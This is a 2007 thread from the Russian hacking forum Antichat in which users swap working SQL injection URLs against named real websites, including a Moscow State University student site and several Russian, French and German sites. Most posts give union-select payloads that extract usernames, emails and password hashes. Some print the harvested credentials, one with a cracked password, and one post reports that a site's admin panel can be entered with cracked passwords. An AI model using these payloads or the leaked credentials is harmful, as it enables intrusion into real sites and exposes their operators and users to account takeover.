ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj
  #1991  
Старый 18.04.2007, 22:06
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://www.dubinushka.ru/ (Студенческий сайт Физического факультета МГУ)
уязвимость: http://www.dubinushka.ru/photo_podthemes.php?pt_id=10'
подобранные таблицы: users
подобранные поля: login,pass
17 организмов
Цитата:
http://www.dubinushka.ru/photo_podthemes.php?pt_id=10+and+1=0+union+select+ 11,22,login,pass+from+users/*
Имеются на сайте:
админка http://www.dubinushka.ru/admin/
В неё можно зайти под любым логином из 17-ти, зная пароль, (пароли md5, несколько сразу находятся в онлайне)
Форум - ipb 2.1.7 - 5k+ организмов.
 
Ответить с цитированием

  #1992  
Старый 18.04.2007, 22:07
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.bluetouch.fr

Ты хде же, це блютуч бачишь?


Код:
http://www.bluetouch.fr/fr/location/reservation.php?id_base=-16+union+select+concat(user(),char(58),version(),char(58),database())/*&type_bato=Oc%C3%A9anis%20361&id_bateau=28
 
Ответить с цитированием

  #1993  
Старый 18.04.2007, 23:08
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.vetdoctor.ru

Код:
http://www.vetdoctor.ru/news/text_reader.php?text_id=-124+union+select+1,2,3,4,5,6,7/*&category_id=24
www.bench-mark.ru

Код:
http://www.bench-mark.ru/main.php?text_id=-1294+union+select+1,concat(user(),char(58),version(),char(58),database()),3,4,5/*
 
Ответить с цитированием

  #1994  
Старый 18.04.2007, 23:57
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.modernpolitics.at

Код:
http://www.modernpolitics.at/text.php?id_text=-105+union+select+1,concat(user(),char(58),version(),char(58),database())/*
 
Ответить с цитированием

  #1995  
Старый 19.04.2007, 07:58
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www.zonewm.biz
Не нашел где деньги выводить
Код:
http://zonewm.biz/showa.php?id=-132+union+select+1,2,3,concat_ws(char(58,58),mail,pass),5,6,7,8+from+user+limit+1,1/*
login : pass
id:1
agpss@rambler.ru
d838d31c16c14b2765fa4c19ff0b9044 = allazar
 
Ответить с цитированием

  #1996  
Старый 19.04.2007, 08:23
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

2Isis уже было), скорей бы антибоян был готов=).

http://neuroshima.elixir.int.pl/infopage.php?id=-1+union+select+count(concat_ws(0x3a,nick,pass,mail )),2+from+elixir_users/*
 
Ответить с цитированием

  #1997  
Старый 19.04.2007, 10:29
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

мава
Цитата:
http://www.heymancenter.org/event_email.php?id=21+order+by+28
 
Ответить с цитированием

  #1998  
Старый 19.04.2007, 13:22
Аватар для TANZWUT
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


Отправить сообщение для TANZWUT с помощью ICQ
По умолчанию

_http://midmich.net/news/read.php?id=-1+union+select+111,concat(user(),version(),databas e()),333,444,555/*
__________________
Лучший способ защиты - это нападение!!!
 
Ответить с цитированием

  #1999  
Старый 19.04.2007, 14:32
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Незабываем проверять инжекты на АНТИБОЯНЕ
Обработано уже 89 страниц, но одному этим заниматься очень утомительно
Всем желающим помочь в создании антибоянного листа, просьба обращаться в личку, особенная помощь нужна в диапазоне 110-150 страницы.
Кстати Isis- http://www.ladofon.ru- боян и BlackCats тоже набоянил =\
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 19.04.2007 в 14:36..
 
Ответить с цитированием

  #2000  
Старый 19.04.2007, 16:17
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

www.unicttaskforce.org
PHP код:
http://www.unicttaskforce.org/perl/documents.pl?id=-1392+order+by+12/* 
http://z-tec.ru
PHP код:
http://z-tec.ru/index/catalogue/showitem.php?id=-110+union+select+1/* 
www.cityslam.ru
PHP код:
http://www.cityslam.ru/catalog.php?id=-101+union+select+1,2,3,4,5,6,concat_ws(char(58),version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20/* 
www.pec.spb.ru
PHP код:
http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,password,email),3+from+users+limit+8,1/* 

www.flugzeugbilder.de
PHP код:
http://www.flugzeugbilder.de/show.php?id=-567978+union+select+1,2,3,4,5,concat_ws(char(58),version(),database(),user()),password,concat(user,char(58)),9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+limit+4,1/* 
root: 3616438873d71bd2
ivax: 652fa1a75d18da89
wx: 68708852333c8a5e
pp: 1b112489580fbed1
air: 2a98610a18cbfe30
всего 4 юзера.Кодировка по мойму MD5

Версия - 4.0.21-Max-log
database - fb
юзер - pp@localhost


www.luftfahrt.net Сайт какойто Авиокампании.
PHP код:
http://www.luftfahrt.net/galerie/showpix.php?id=-21276+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ